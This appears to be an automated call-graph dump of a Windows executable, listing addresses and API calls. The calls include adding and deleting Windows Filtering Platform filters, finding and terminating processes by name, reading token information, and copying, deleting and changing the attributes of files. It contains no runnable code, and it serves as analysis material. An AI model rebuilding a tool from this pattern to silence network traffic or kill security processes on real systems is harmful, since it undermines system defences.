9374->9376 9375->9376 9376->9029 9376->9035 9376->9301 9378 7ff7e3cea200 9377->9378 9379 7ff7e3cea22c 9377->9379 9390 7ff7e3cea0f0 9378->9390 9381 7ff7e3ce14e2 6 API calls 9379->9381 9382 7ff7e3cea217 9381->9382 9382->9305 9385 7ff7e3ce932b 9383->9385 9386 7ff7e3ce937a 9383->9386 9384 7ff7e3ce934f 9384->9305 9385->9384 9388 7ff7e3ce14e2 6 API calls 9385->9388 9387 7ff7e3ce14e2 6 API calls 9386->9387 9389 7ff7e3ce952d 9387->9389 9388->9384 9391 7ff7e3cea153 9390->9391 9392 7ff7e3cea112 9390->9392 9393 7ff7e3ce14e2 6 API calls 9391->9393 9402 7ff7e3ce9ed0 9392->9402 9395 7ff7e3cea12b 9393->9395 9395->9382 9397 7ff7e3cea183 _errno 9398 7ff7e3cf0568 9397->9398 9399 7ff7e3cea1a5 _errno 9398->9399 9399->9395 9400 7ff7e3cea1b4 _errno 9399->9400 9401 7ff7e3ce14e2 6 API calls 9400->9401 9401->9395 9403 7ff7e3ce9ee1 9402->9403 9404 7ff7e3ce9f19 9402->9404 9405 7ff7e3ce9bb9 7 API calls 9403->9405 9406 7ff7e3ce14e2 6 API calls 9404->9406 9407 7ff7e3ce9ef4 9405->9407 9408 7ff7e3ce9ef8 9406->9408 9407->9408 9410 7ff7e3ce9d40 9407->9410 9408->9395 9408->9397 9411 7ff7e3ce9d73 9410->9411 9412 7ff7e3ce9d58 9410->9412 9415 7ff7e3ce14e2 6 API calls 9411->9415 9413 7ff7e3ce9da6 9412->9413 9414 7ff7e3ce9d5d 9412->9414 9417 7ff7e3ce14e2 6 API calls 9413->9417 9416 7ff7e3ce9dd9 9414->9416 9422 7ff7e3ce9d62 9414->9422 9424 7ff7e3ce9d9c 9415->9424 9418 7ff7e3ce14e2 6 API calls 9416->9418 9417->9424 9418->9424 9419 7ff7e3ce9e3b 9421 7ff7e3ce9e44 9419->9421 9419->9424 9420 7ff7e3ce9e18 strcmp 9420->9422 9423 7ff7e3ce14e2 6 API calls 9421->9423 9422->9419 9422->9420 9425 7ff7e3ce9e69 9423->9425 9426 7ff7e3ce14e2 6 API calls 9424->9426 9425->9408 9426->9425 9450 7ff7e3ce8008 GetFileAttributesW 9427->9450 9430 7ff7e3ce8192 wcslen 9467 7ff7e3ce7102 9430->9467 9433 7ff7e3ce82b9 FwpmFilterAdd0 9435 7ff7e3ce8461 9433->9435 9436 7ff7e3ce84ce FwpmFilterAdd0 9433->9436 9434 7ff7e3ce8239 FwpmFilterDeleteByKey0 9437 7ff7e3ce825a 9434->9437 9438 7ff7e3ce8277 FwpmFilterDeleteByKey0 9434->9438 9441 7ff7e3ce14e2 6 API calls 9435->9441 9442 7ff7e3ce8540 9436->9442 9443 7ff7e3ce8474 9436->9443 9439 7ff7e3ce14e2 6 API calls 9437->9439 9440 7ff7e3ce829c 9438->9440 9445 7ff7e3ce8182 9438->9445 9439->9445 9446 7ff7e3ce14e2 6 API calls 9440->9446 9441->9443 9444 7ff7e3ce14e2 6 API calls 9442->9444 9447 7ff7e3ce84a1 9443->9447 9448 7ff7e3ce848a GetProcessHeap HeapFree 9443->9448 9444->9443 9445->9333 9446->9445 9447->9445 9449 7ff7e3ce84b2 GetProcessHeap HeapFree 9447->9449 9448->9447 9449->9445 9451 7ff7e3ce8149 9450->9451 9452 7ff7e3ce8028 9450->9452 9473 7ff7e3ce7e04 9452->9473 9454 7ff7e3ce803b 9455 7ff7e3ce804f GetProcessHeap HeapAlloc 9454->9455 9466 7ff7e3ce8041 9454->9466 9456 7ff7e3ce8071 9455->9456 9457 7ff7e3ce80d9 9455->9457 9458 7ff7e3ce807b wcslen GetProcessHeap HeapAlloc 9456->9458 9456->9466 9459 7ff7e3ce14e2 6 API calls 9457->9459 9460 7ff7e3ce80f7 9458->9460 9464 7ff7e3ce80bb 9458->9464 9459->9456 9463 7ff7e3ce14e2 6 API calls 9460->9463 9461 7ff7e3ce810f 9465 7ff7e3ce8114 GetProcessHeap HeapFree 9461->9465 9461->9466 9462 7ff7e3ce80c7 memcpy 9462->9466 9463->9464 9464->9461 9464->9462 9465->9466 9466->9430 9466->9445 9468 7ff7e3ce710b 9467->9468 9469 7ff7e3ce711d 9467->9469 9471 7ff7e3ce7110 9468->9471 9472 7ff7e3ce14e2 6 API calls 9468->9472 9470 7ff7e3ce14e2 6 API calls 9469->9470 9470->9471 9471->9433 9471->9434 9472->9471 9474 7ff7e3ce7e59 9473->9474 9475 7ff7e3ce7e6f QueryDosDeviceW 9474->9475 9479 7ff7e3ce7e5f 9474->9479 9476 7ff7e3ce7e90 GetLastError 9475->9476 9477 7ff7e3ce7f6c 9475->9477 9478 7ff7e3ce14e2 6 API calls 9476->9478 9481 7ff7e3ce7de7 9477->9481 9478->9479 9479->9454 9484 7ff7e3ceb270 9481->9484 9485 7ff7e3ceb295 9484->9485 9486 7ff7e3ceb27e 9484->9486 9487 7ff7e3cedadd fputwc fwprintf _errno 9485->9487 9488 7ff7e3cedadd fputwc fwprintf _errno 9486->9488 9489 7ff7e3ce7dff 9487->9489 9488->9489 9489->9479 9491 7ff7e3ce1d02 LoadLibraryA 9490->9491 9492 7ff7e3ce1d2b 9490->9492 9493 7ff7e3ce1d10 9491->9493 9494 7ff7e3ce1d2e GetLastError 9491->9494 9492->9494 9495 7ff7e3ce14e2 6 API calls 9493->9495 9496 7ff7e3ce14e2 6 API calls 9494->9496 9497 7ff7e3ce1d29 9495->9497 9496->9497 9497->9339 9498 7ff7e3ce1c73 9497->9498 9499 7ff7e3ce1c90 GetProcAddress 9498->9499 9500 7ff7e3ce1cc1 9498->9500 9501 7ff7e3ce1cc6 GetLastError 9499->9501 9502 7ff7e3ce1ca1 9499->9502 9500->9501 9504 7ff7e3ce14e2 6 API calls 9501->9504 9503 7ff7e3ce14e2 6 API calls 9502->9503 9505 7ff7e3ce1cbf 9503->9505 9504->9505 9505->9339 9507 7ff7e3ce7c4f 9506->9507 9508 7ff7e3ce79a1 9506->9508 9509 7ff7e3ce14e2 6 API calls 9507->9509 9510 7ff7e3ce7102 6 API calls 9508->9510 9511 7ff7e3ce7c3b 9509->9511 9512 7ff7e3ce79b1 9510->9512 9511->9358 9513 7ff7e3ce7a46 9512->9513 9514 7ff7e3ce7c6c FwpmFilterDeleteByKey0 9512->9514 9518 7ff7e3ce7b20 FwpmFilterAdd0 9513->9518 9515 7ff7e3ce7c8d 9514->9515 9516 7ff7e3ce7ca7 FwpmFilterDeleteByKey0 9514->9516 9519 7ff7e3ce14e2 6 API calls 9515->9519 9516->9511 9517 7ff7e3ce7cd2 9516->9517 9520 7ff7e3ce14e2 6 API calls 9517->9520 9521 7ff7e3ce7cef FwpmFilterAdd0 9518->9521 9522 7ff7e3ce7c07 9518->9522 9519->9511 9520->9511 9524 7ff7e3ce7d5d 9521->9524 9523 7ff7e3ce14e2 6 API calls 9522->9523 9525 7ff7e3ce7c1a 9523->9525 9526 7ff7e3ce14e2 6 API calls 9524->9526 9525->9511 9527 7ff7e3ce7c24 GetProcessHeap HeapFree 9525->9527 9528 7ff7e3ce7d7a 9526->9528 9527->9511 9607 7ff7e3ce58fa 9612 7ff7e3ce5189 9607->9612 9610 7ff7e3ce590f 9613 7ff7e3ce5219 CopyFileA 9612->9613 9616 7ff7e3ce51b1 9612->9616 9614 7ff7e3ce5242 GetLastError 9613->9614 9613->9616 9615 7ff7e3ce14e2 6 API calls 9614->9615 9621 7ff7e3ce526c 9615->9621 9618 7ff7e3ce51e8 9616->9618 9616->9621 9617 7ff7e3ce14e2 6 API calls 9619 7ff7e3ce53ba 9617->9619 9620 7ff7e3ce14e2 6 API calls 9618->9620 9619->9619 9622 7ff7e3ce5209 9620->9622 9621->9617 9622->9610 9623 7ff7e3ce4bbd 9622->9623 9624 7ff7e3ce4bd4 DeleteFileA 9623->9624 9632 7ff7e3ce4bde 9623->9632 9625 7ff7e3ce4c2b GetLastError 9624->9625 9624->9632 9626 7ff7e3ce14e2 6 API calls 9625->9626 9626->9632 9627 7ff7e3ce4d5a 9628 7ff7e3ce14e2 6 API calls 9627->9628 9630 7ff7e3ce4d7c 9628->9630 9629 7ff7e3ce4c0a 9631 7ff7e3ce14e2 6 API calls 9629->9631 9630->9630 9633 7ff7e3ce4c20 9631->9633 9632->9627 9632->9629 9633->9610 11063 7ff7e3ceddf7 11064 7ff7e3cede0d 11063->11064 11071 7ff7e3ced93d 11064->11071 11066 7ff7e3cee2e0 11067 7ff7e3cee301 11066->11067 11068 7ff7e3ceccd9 2 API calls 11066->11068 11068->11067 11069 7ff7e3cedb86 11069->11066 11070 7ff7e3ceccd9 fputwc fwprintf 11069->11070 11070->11069 11072 7ff7e3ced94e 11071->11072 11073 7ff7e3ced00f 6 API calls 11072->11073 11074 7ff7e3ced97e 11073->11074 11075 7ff7e3ced993 11074->11075 11076 7ff7e3ced9a0 11074->11076 11077 7ff7e3cecc00 10 API calls 11075->11077 11078 7ff7e3ced897 9 API calls 11076->11078 11079 7ff7e3ced99e 11077->11079 11078->11079 11079->11069 9634 7ff7e3cedcf8 9635 7ff7e3cedd06 9634->9635 9636 7ff7e3cedd4f 9635->9636 9637 7ff7e3cedd3f 9635->9637 9653 7ff7e3ced1bd 9636->9653 9645 7ff7e3ced3c1 9637->9645 9640 7ff7e3cedb86 9641 7ff7e3cee2e0 9640->9641 9644 7ff7e3ceccd9 fputwc fwprintf 9640->9644 9642 7ff7e3cee301 9641->9642 9643 7ff7e3ceccd9 2 API calls 9641->9643 9643->9642 9644->9640 9648 7ff7e3ced3f3 9645->9648 9646 7ff7e3ced513 9647 7ff7e3ced593 9646->9647 9649 7ff7e3ceca90 fputwc 9646->9649 9650 7ff7e3ced5af 9647->9650 9651 7ff7e3ceca90 fputwc 9647->9651 9648->9646 9652 7ff7e3ceca90 fputwc 9648->9652 9649->9646 9650->9640 9651->9647 9652->9648 9659 7ff7e3ced20f 9653->9659 9654 7ff7e3ced373 9655 7ff7e3ced38c 9654->9655 9657 7ff7e3ceca90 fputwc 9654->9657 9658 7ff7e3ced3b3 9655->9658 9660 7ff7e3ceca90 fputwc 9655->9660 9656 7ff7e3ceca90 fputwc 9656->9659 9657->9654 9658->9640 9659->9654 9659->9656 9660->9655 11080 7ff7e3cee1b5 11081 7ff7e3cee1bd localeconv 11080->11081 11086 7ff7e3cedb86 11080->11086 11082 7ff7e3cf026c 6 API calls 11081->11082 11082->11086 11083 7ff7e3ceccd9 fputwc fwprintf 11083->11086 11084 7ff7e3cee2e0 11085 7ff7e3cee301 11084->11085 11087 7ff7e3ceccd9 2 API calls 11084->11087 11086->11083 11086->11084 11087->11085 10214 7ff7e3cf03ab ___mb_cur_max_func ___lc_codepage_func 10215 7ff7e3cf03da 10214->10215 10216 7ff7e3cf0150 4 API calls 10215->10216 10217 7ff7e3cf03f9 10216->10217 9667 7ff7e3cec8ac 9668 7ff7e3cec382 9667->9668 9668->9667 9669 7ff7e3ceca67 9668->9669 9670 7ff7e3ceb3e7 fputc 9668->9670 9670->9668 11109 7ff7e3cea5a1 inet_addr 9679 7ff7e3ce749c 9680 7ff7e3ce74fd 9679->9680 9681 7ff7e3ce74bd 9679->9681 9682 7ff7e3ce14e2 6 API calls 9680->9682 9683 7ff7e3ce7536 9681->9683 9684 7ff7e3ce74c2 9681->9684 9689 7ff7e3ce7526 9682->9689 9685 7ff7e3ce14e2 6 API calls 9683->9685 9686 7ff7e3ce74d6 strlen strlen 9684->9686 9687 7ff7e3ce756f 9684->9687 9685->9689 9686->9689 9688 7ff7e3ce14e2 6 API calls 9687->9688 9688->9689 9690 7ff7e3cec49e 9691 7ff7e3cec4a7 9690->9691 9696 7ff7e3ceb593 9691->9696 9697 7ff7e3ceb5a3 9696->9697 9698 7ff7e3ceb5c1 strlen 9697->9698 9699 7ff7e3ceb5ba 9697->9699 9698->9699 11125 7ff7e3cec59e 11126 7ff7e3cec5b4 11125->11126 11131 7ff7e3cec130 11126->11131 11128 7ff7e3ceca67 11129 7ff7e3cec382 11129->11128 11130 7ff7e3ceb3e7 fputc 11129->11130 11130->11129 11132 7ff7e3cec141 11131->11132 11133 7ff7e3ceb2d0 6 API calls 11132->11133 11134 7ff7e3cec171 11133->11134 11135 7ff7e3cec186 11134->11135 11136 7ff7e3cec193 11134->11136 11137 7ff7e3ceb5da fputc 11135->11137 11138 7ff7e3cec08a 11 API calls 11136->11138 11139 7ff7e3cec191 11137->11139 11138->11139 11139->11129 11140 7ff7e3cefd98 11141 7ff7e3cef663 6 API calls 11140->11141 11142 7ff7e3cefdb4 11141->11142 10234 7ff7e3ce6fd5 10235 7ff7e3ce6fe0 10234->10235 10236 7ff7e3ce6feb GetSystemTimeAsFileTime 10234->10236 10236->10235 11148 7ff7e3cec5cf 11149 7ff7e3cec5e5 11148->11149 11154 7ff7e3ceb919 11149->11154 11151 7ff7e3ceca67 11152 7ff7e3cec382 11152->11151 11153 7ff7e3ceb3e7 fputc 11152->11153 11153->11152 11155 7ff7e3ceb92a 11154->11155 11156 7ff7e3ceb2d0 6 API calls 11155->11156 11157 7ff7e3ceb957 11156->11157 11158 7ff7e3ceb96c 11157->11158 11159 7ff7e3ceb979 11157->11159 11160 7ff7e3ceb5da fputc 11158->11160 11161 7ff7e3ceb721 11 API calls 11159->11161 11163 7ff7e3ceb977 11160->11163 11162 7ff7e3ceb984 11161->11162 11162->11163 11164 7ff7e3ceb3e7 fputc 11162->11164 11163->11152 11164->11162 10512 7ff7e3cea6d0 10513 7ff7e3cea6f7 10512->10513 10514 7ff7e3cea763 fprintf 10513->10514 11173 7ff7e3ce5dc4 11174 7ff7e3ce5de5 11173->11174 11175 7ff7e3ce5deb CloseHandle 11174->11175 11176 7ff7e3ce5df4 11174->11176 11175->11176 10255 7ff7e3ce37c0 10256 7ff7e3ce1cf4 8 API calls 10255->10256 10257 7ff7e3ce37d0 10256->10257 10258 7ff7e3ce1c73 8 API calls 10257->10258 10264 7ff7e3ce3816 10257->10264 10259 7ff7e3ce37e4 10258->10259 10260 7ff7e3ce3820 GetLastError 10259->10260 10261 7ff7e3ce37fc 10259->10261 10259->10264 10263 7ff7e3ce14e2 6 API calls 10260->10263 10262 7ff7e3ce14e2 6 API calls 10261->10262 10262->10264 10263->10264 10274 7ff7e3ce1bbb 10275 7ff7e3ce1bf4 10274->10275 10276 7ff7e3ce1bcc 10274->10276 10277 7ff7e3ce14e2 6 API calls 10275->10277 10278 7ff7e3ce14e2 6 API calls 10276->10278 10279 7ff7e3ce1bd1 10276->10279 10277->10279 10278->10279 9722 7ff7e3cec4b9 9725 7ff7e3cec4c7 9722->9725 9723 7ff7e3cec50e 9739 7ff7e3ceb9b0 9723->9739 9724 7ff7e3cec4fe 9731 7ff7e3cebbb4 9724->9731 9725->9723 9725->9724 9728 7ff7e3ceca67 9729 7ff7e3cec382 9729->9728 9730 7ff7e3ceb3e7 fputc 9729->9730 9730->9729 9732 7ff7e3cebbe6 9731->9732 9733 7ff7e3cebd06 9732->9733 9747 7ff7e3ceb3e7 9732->9747 9734 7ff7e3ceb3e7 fputc 9733->9734 9738 7ff7e3cebd86 9733->9738 9734->9733 9735 7ff7e3cebda2 9735->9729 9736 7ff7e3ceb3e7 fputc 9736->9738 9738->9735 9738->9736 9740 7ff7e3ceba02 9739->9740 9741 7ff7e3cebb66 9740->9741 9743 7ff7e3ceb3e7 fputc 9740->9743 9742 7ff7e3cebb7f 9741->9742 9744 7ff7e3ceb3e7 fputc 9741->9744 9745 7ff7e3cebba6 9742->9745 9746 7ff7e3ceb3e7 fputc 9742->9746 9743->9740 9744->9741 9745->9729 9746->9742 9748 7ff7e3ceb3f8 9747->9748 9749 7ff7e3ceb410 9748->9749 9750 7ff7e3ceb409 fputc 9748->9750 9749->9732 9750->9749 11181 7ff7e3cf05b9 UnlockFileEx 9751 7ff7e3cedc75 9752 7ff7e3cedccd 9751->9752 9753 7ff7e3cedc8a 9751->9753 9754 7ff7e3cecfc8 strlen 9752->9754 9755 7ff7e3cedcb4 wcslen 9753->9755 9757 7ff7e3cedcad 9753->9757 9756 7ff7e3cedb86 9754->9756 9755->9757 9759 7ff7e3cee2e0 9756->9759 9762 7ff7e3ceccd9 fputwc fwprintf 9756->9762 9758 7ff7e3ceccd9 2 API calls 9757->9758 9758->9756 9760 7ff7e3cee301 9759->9760 9761 7ff7e3ceccd9 2 API calls 9759->9761 9761->9760 9762->9756 10280 7ff7e3ce6776 10281 7ff7e3ce678c 10280->10281 10282 7ff7e3ce67fb 10280->10282 10284 7ff7e3ce6795 10281->10284 10285 7ff7e3ce682e 10281->10285 10283 7ff7e3ce14e2 6 API calls 10282->10283 10300 7ff7e3ce6824 10283->10300 10287 7ff7e3ce685e 10284->10287 10288 7ff7e3ce679e 10284->10288 10286 7ff7e3ce14e2 6 API calls 10285->10286 10286->10300 10289 7ff7e3ce14e2 6 API calls 10287->10289 10290 7ff7e3ce688e 10288->10290 10291 7ff7e3ce67aa ExpandEnvironmentStringsA 10288->10291 10289->10300 10292 7ff7e3ce14e2 6 API calls 10290->10292 10293 7ff7e3ce67bb 10291->10293 10294 7ff7e3ce6909 GetLastError 10291->10294 10292->10300 10297 7ff7e3ce69dc 10293->10297 10298 7ff7e3ce67c9 10293->10298 10296 7ff7e3ce14e2 6 API calls 10294->10296 10295 7ff7e3ce6a51 10296->10300 10301 7ff7e3ce14e2 6 API calls 10297->10301 10302 7ff7e3ce14e2 6 API calls 10298->10302 10299 7ff7e3ce14e2 6 API calls 10303 7ff7e3ce67f1 10299->10303 10300->10295 10300->10299 10301->10300 10302->10303 9763 7ff7e3cea072 9764 7ff7e3cea0b6 9763->9764 9765 7ff7e3cea08c 9763->9765 9767 7ff7e3ce14e2 6 API calls 9764->9767 9769 7ff7e3ce9f70 9765->9769 9768 7ff7e3cea0a3 9767->9768 9770 7ff7e3ce9f9b 9769->9770 9771 7ff7e3ce9fd7 9769->9771 9772 7ff7e3ce9ed0 8 API calls 9770->9772 9773 7ff7e3ce14e2 6 API calls 9771->9773 9774 7ff7e3ce9fae 9772->9774 9780 7ff7e3ce9fb4 9773->9780 9775 7ff7e3cea007 _errno 9774->9775 9774->9780 9776 7ff7e3cf0560 9775->9776 9777 7ff7e3cea029 _errno 9776->9777 9778 7ff7e3cea034 _errno 9777->9778 9777->9780 9779 7ff7e3ce14e2 6 API calls 9778->9779 9779->9780 9780->9768 11182 7ff7e3ce2d71 11183 7ff7e3ce2f1c 11182->11183 11184 7ff7e3ce2f2d 11183->11184 11185 7ff7e3ce2f27 CloseHandle 11183->11185 11186 7ff7e3ce2f36 11184->11186 11188 7ff7e3ce29db 11184->11188 11185->11184 11187 7ff7e3ce14e2 6 API calls 11186->11187 11189 7ff7e3ce2a3c 11186->11189 11187->11189 11188->11189 11190 7ff7e3ce14e2 6 API calls 11188->11190 11190->11189 10524 7ff7e3cea66c 10525 7ff7e3cea67e 10524->10525 10527 7ff7e3cea693 10525->10527 10528 7ff7e3ceaebd 10525->10528 10529 7ff7e3ceaecb 10528->10529 10530 7ff7e3ceaed3 10528->10530 10529->10530 10531 7ff7e3ceaee1 10529->10531 10532 7ff7e3ceaed1 10529->10532 10530->10527 10531->10530 10533 7ff7e3ceaeeb InitializeCriticalSection 10531->10533 10532->10530 10534 7ff7e3ceaf29 free 10532->10534 10535 7ff7e3ceaf37 DeleteCriticalSection 10532->10535 10533->10530 10534->10532 10535->10530 10313 7ff7e3cea369 10314 7ff7e3cea3a7 10313->10314 10315 7ff7e3cea378 10313->10315 10317 7ff7e3ce14e2 6 API calls 10314->10317 10319 7ff7e3cea264 10315->10319 10318 7ff7e3cea390 10317->10318 10320 7ff7e3cea286 10319->10320 10321 7ff7e3cea2c9 10319->10321 10323 7ff7e3ce9ed0 8 API calls 10320->10323 10322 7ff7e3ce14e2 6 API calls 10321->10322 10324 7ff7e3cea29f 10322->10324 10325 7ff7e3cea299 10323->10325 10324->10318 10325->10324 10326 7ff7e3cea2f9 _errno _strtoui64 _errno 10325->10326 10326->10324 10327 7ff7e3cea32c _errno 10326->10327 10328 7ff7e3ce14e2 6 API calls 10327->10328 10328->10324 9850 7ff7e3ce4c69 9851 7ff7e3ce4be8 9850->9851 9852 7ff7e3ce4d5a 9851->9852 9854 7ff7e3ce4c0a 9851->9854 9853 7ff7e3ce14e2 6 API calls 9852->9853 9855 7ff7e3ce4d7c 9853->9855 9856 7ff7e3ce14e2 6 API calls 9854->9856 9855->9855 9857 7ff7e3ce4c20 9856->9857 10338 7ff7e3ce3b64 10339 7ff7e3ce3bc1 10338->10339 10340 7ff7e3ce3b8a 10338->10340 10343 7ff7e3ce14e2 6 API calls 10339->10343 10341 7ff7e3ce3b8f 10340->10341 10342 7ff7e3ce3bec 10340->10342 10357 7ff7e3ce3909 10341->10357 10345 7ff7e3ce14e2 6 API calls 10342->10345 10350 7ff7e3ce3bb9 10343->10350 10345->10350 10347 7ff7e3ce3ba2 SetFileAttributesA 10348 7ff7e3ce3c3e GetLastError 10347->10348 10347->10350 10349 7ff7e3ce14e2 6 API calls 10348->10349 10349->10350 10350->10348 10351 7ff7e3ce3c6a 10350->10351 10352 7ff7e3ce3d02 10351->10352 10353 7ff7e3ce3d7d 10351->10353 10356 7ff7e3ce14e2 6 API calls 10352->10356 10354 7ff7e3ce14e2 6 API calls 10353->10354 10355 7ff7e3ce3d30 10354->10355 10356->10355 10358 7ff7e3ce3921 10357->10358 10359 7ff7e3ce3998 10357->10359 10361 7ff7e3ce39d1 10358->10361 10362 7ff7e3ce392a GetFileAttributesA 10358->10362 10360 7ff7e3ce14e2 6 API calls 10359->10360 10366 7ff7e3ce393b 10360->10366 10363 7ff7e3ce14e2 6 API calls 10361->10363 10364 7ff7e3ce3a0a GetLastError 10362->10364 10362->10366 10363->10366 10365 7ff7e3ce14e2 6 API calls 10364->10365 10365->10366 10368 7ff7e3ce3974 10366->10368 10369 7ff7e3ce3b3a 10366->10369 10367 7ff7e3ce14e2 6 API calls 10370 7ff7e3ce3b5f 10367->10370 10371 7ff7e3ce14e2 6 API calls 10368->10371 10369->10367 10370->10370 10372 7ff7e3ce398a 10371->10372 10372->10347 10372->10350 9858 7ff7e3ce3c63 9859 7ff7e3ce3cec 9858->9859 9860 7ff7e3ce3d7d 9859->9860 9863 7ff7e3ce3d02 9859->9863 9861 7ff7e3ce14e2 6 API calls 9860->9861 9862 7ff7e3ce3d30 9861->9862 9864 7ff7e3ce14e2 6 API calls 9863->9864 9864->9862 9865 7ff7e3ce2463 9866 7ff7e3ce2484 CloseHandle 9865->9866 9886 7ff7e3ce23f0 9866->9886 9867 7ff7e3ce26ed Process32Next 9869 7ff7e3ce2704 GetLastError 9867->9869 9867->9886 9868 7ff7e3ce2888 CloseHandle 9871 7ff7e3ce21e4 9868->9871 9872 7ff7e3ce28a3 9868->9872 9869->9886 9871->9872 9874 7ff7e3ce21f4 9871->9874 9879 7ff7e3ce14e2 6 API calls 9872->9879 9873 7ff7e3ce14e2 6 API calls 9873->9886 9880 7ff7e3ce14e2 6 API calls 9874->9880 9875 7ff7e3ce24d3 OpenProcess 9877 7ff7e3ce24f4 TerminateProcess 9875->9877 9878 7ff7e3ce25a3 GetLastError 9875->9878 9876 7ff7e3ce24c2 strcmp 9876->9875 9876->9886 9877->9866 9881 7ff7e3ce250a GetLastError 9877->9881 9882 7ff7e3ce14e2 6 API calls 9878->9882 9883 7ff7e3ce2211 9879->9883 9880->9883 9884 7ff7e3ce14e2 6 API calls 9881->9884 9882->9886 9884->9886 9885 7ff7e3ce254b 9886->9866 9886->9867 9886->9868 9886->9873 9886->9875 9886->9876 9886->9885 11191 7ff7e3ce1d60 11192 7ff7e3ce1e23 11191->11192 11193 7ff7e3ce1d77 11191->11193 11194 7ff7e3ce14e2 6 API calls 11192->11194 11195 7ff7e3ce1e53 11193->11195 11196 7ff7e3ce1d80 OpenProcessToken 11193->11196 11217 7ff7e3ce1e21 11194->11217 11197 7ff7e3ce14e2 6 API calls 11195->11197 11198 7ff7e3ce1eb8 GetLastError 11196->11198 11199 7ff7e3ce1d98 GetTokenInformation 11196->11199 11197->11217 11202 7ff7e3ce14e2 6 API calls 11198->11202 11200 7ff7e3ce1fcd 11199->11200 11201 7ff7e3ce1dce GetLastError 11199->11201 11203 7ff7e3ce2090 LocalAlloc 11200->11203 11208 7ff7e3ce20cb 11200->11208 11204 7ff7e3ce1de0 11201->11204 11205 7ff7e3ce1f67 LocalAlloc 11201->11205 11202->11217 11203->11208 11209 7ff7e3ce20a8 GetLengthSid memcpy 11203->11209 11210 7ff7e3ce14e2 6 API calls 11204->11210 11206 7ff7e3ce1f82 GetTokenInformation 11205->11206 11205->11208 11206->11203 11212 7ff7e3ce1fac GetLastError 11206->11212 11207 7ff7e3ce14e2 6 API calls 11213 7ff7e3ce1ead 11207->11213 11209->11208 11211 7ff7e3ce1df6 11210->11211 11214 7ff7e3ce1e05 LocalFree 11211->11214 11215 7ff7e3ce1e0e CloseHandle 11211->11215 11216 7ff7e3ce14e2 6 API calls 11212->11216 11214->11215 11215->11213 11215->11217 11216->11200 11217->11207 11218 7ff7e3ce6d60 11219 7ff7e3ce6d6f 11218->11219 11220 7ff7e3ce6d82 11218->11220 11221 7ff7e3ce6d74 11219->11221 11222 7ff7e3ce6db5 11219->11222 11223 7ff7e3ce14e2 6 API calls 11220->11223 11224 7ff7e3ce6d79 11221->11224 11226 7ff7e3ce14e2 6 API calls 11221->11226 11225 7ff7e3ce14e2 6 API calls 11222->11225 11223->11224 11225->11224 11226->11224 9887 7ff7e3ce385c 9888 7ff7e3ce3869 9887->9888 9896 7ff7e3ce38a9 9887->9896 9890 7ff7e3ce1cf4 8 API calls 9888->9890 9889 7ff7e3ce14e2 6 API calls 9891 7ff7e3ce38ce 9889->9891 9892 7ff7e3ce3875 9890->9892 9892->9891 9893 7ff7e3ce1c73 8 API calls 9892->9893 9894 7ff7e3ce3889 9893->9894 9894->9891 9895 7ff7e3ce38d8 GetLastError 9894->9895 9894->9896 9897 7ff7e3ce14e2 6 API calls 9895->9897 9896->9889 9897->9891 10373 7ff7e3ce475d 10374 7ff7e3ce4b28 10373->10374 10375 7ff7e3ce4b35 10374->10375 10376 7ff7e3ce4b2d fclose 10374->10376 10377 7ff7e3ce4ba2 10375->10377 10378 7ff7e3ce4b39 10375->10378 10376->10375 10379 7ff7e3ce14e2 6 API calls 10377->10379 10381 7ff7e3ce14e2 6 API calls 10378->10381 10380 7ff7e3ce4b78 10379->10380 10381->10380 11255 7ff7e3cedd5c 11256 7ff7e3cedd6e 11255->11256 11257 7ff7e3ced3c1 fputwc 11256->11257 11261 7ff7e3cedb86 11257->11261 11258 7ff7e3cee2e0 11259 7ff7e3cee301 11258->11259 11260 7ff7e3ceccd9 2 API calls 11258->11260 11260->11259 11261->11258 11262 7ff7e3ceccd9 fputwc fwprintf 11261->11262 11262->11261 10536 7ff7e3cede59 10537 7ff7e3cede6f 10536->10537 10544 7ff7e3ced9bb 10537->10544 10539 7ff7e3cee2e0 10540 7ff7e3cee301 10539->10540 10541 7ff7e3ceccd9 2 API calls 10539->10541 10541->10540 10542 7ff7e3cedb86 10542->10539 10543 7ff7e3ceccd9 fputwc fwprintf 10542->10543 10543->10542 10545 7ff7e3ced9cd 10544->10545 10562 7ff7e3ced00f 10545->10562 10548 7ff7e3ceda1a 10566 7ff7e3cecc00 10548->10566 10549 7ff7e3ceda9d 10553 7ff7e3cedaa1 10549->10553 10554 7ff7e3cedaa8 strlen 10549->10554 10550 7ff7e3ceda2c 10550->10549 10552 7ff7e3ceda42 10550->10552 10555 7ff7e3ceda46 10552->10555 10556 7ff7e3ceda4e strlen 10552->10556 10590 7ff7e3ced897 10553->10590 10554->10553 10570 7ff7e3cecdd0 10555->10570 10556->10555 10558 7ff7e3ceda27 10558->10542 10560 7ff7e3ceda81 10560->10558 10561 7ff7e3ceca90 fputwc 10560->10561 10561->10560 10563 7ff7e3ced02d 10562->10563 10596 7ff7e3cee4e0 10563->10596 10567 7ff7e3cecc16 10566->10567 10567->10567 10568 7ff7e3cecacd 10 API calls 10567->10568 10569 7ff7e3cecc6c 10568->10569 10569->10558 10571 7ff7e3cecdec 10570->10571 10572 7ff7e3cece3d 10571->10572 10575 7ff7e3ceca90 fputwc 10571->10575 10573 7ff7e3ceca90 fputwc 10572->10573 10577 7ff7e3ceceda 10572->10577 10573->10577 10574 7ff7e3cecee0 10576 7ff7e3cecee9 10574->10576 10582 7ff7e3cecf16 10574->10582 10575->10571 10578 7ff7e3ceca90 fputwc 10576->10578 10577->10574 10579 7ff7e3ceca90 fputwc 10577->10579 10581 7ff7e3cecf6b 10578->10581 10579->10577 10580 7ff7e3ceca90 fputwc 10580->10582 10583 7ff7e3cecf7f 10581->10583 10728 7ff7e3cecc72 10581->10728 10582->10580 10582->10581 10586 7ff7e3ceccd9 2 API calls 10582->10586 10587 7ff7e3ceca90 fputwc 10583->10587 10589 7ff7e3cecf97 10583->10589 10585 7ff7e3cecfbf 10585->10560 10586->10582 10587->10583 10588 7ff7e3ceca90 fputwc 10588->10589 10589->10585 10589->10588 10591 7ff7e3ced8b9 10590->10591 10592 7ff7e3cecdd0 9 API calls 10591->10592 10593 7ff7e3ced904 10592->10593 10594 7ff7e3ceca90 fputwc 10593->10594 10595 7ff7e3ced925 10594->10595 10597 7ff7e3cee556 10596->10597 10598 7ff7e3cee6b4 10597->10598 10613 7ff7e3ced120 10597->10613 10660 7ff7e3cef663 10597->10660 10671 7ff7e3cee34c 10598->10671 10601 7ff7e3cee5ee 10602 7ff7e3cee6ac 10601->10602 10604 7ff7e3cee6e0 10601->10604 10667 7ff7e3cef717 10602->10667 10674 7ff7e3cee320 10604->10674 10606 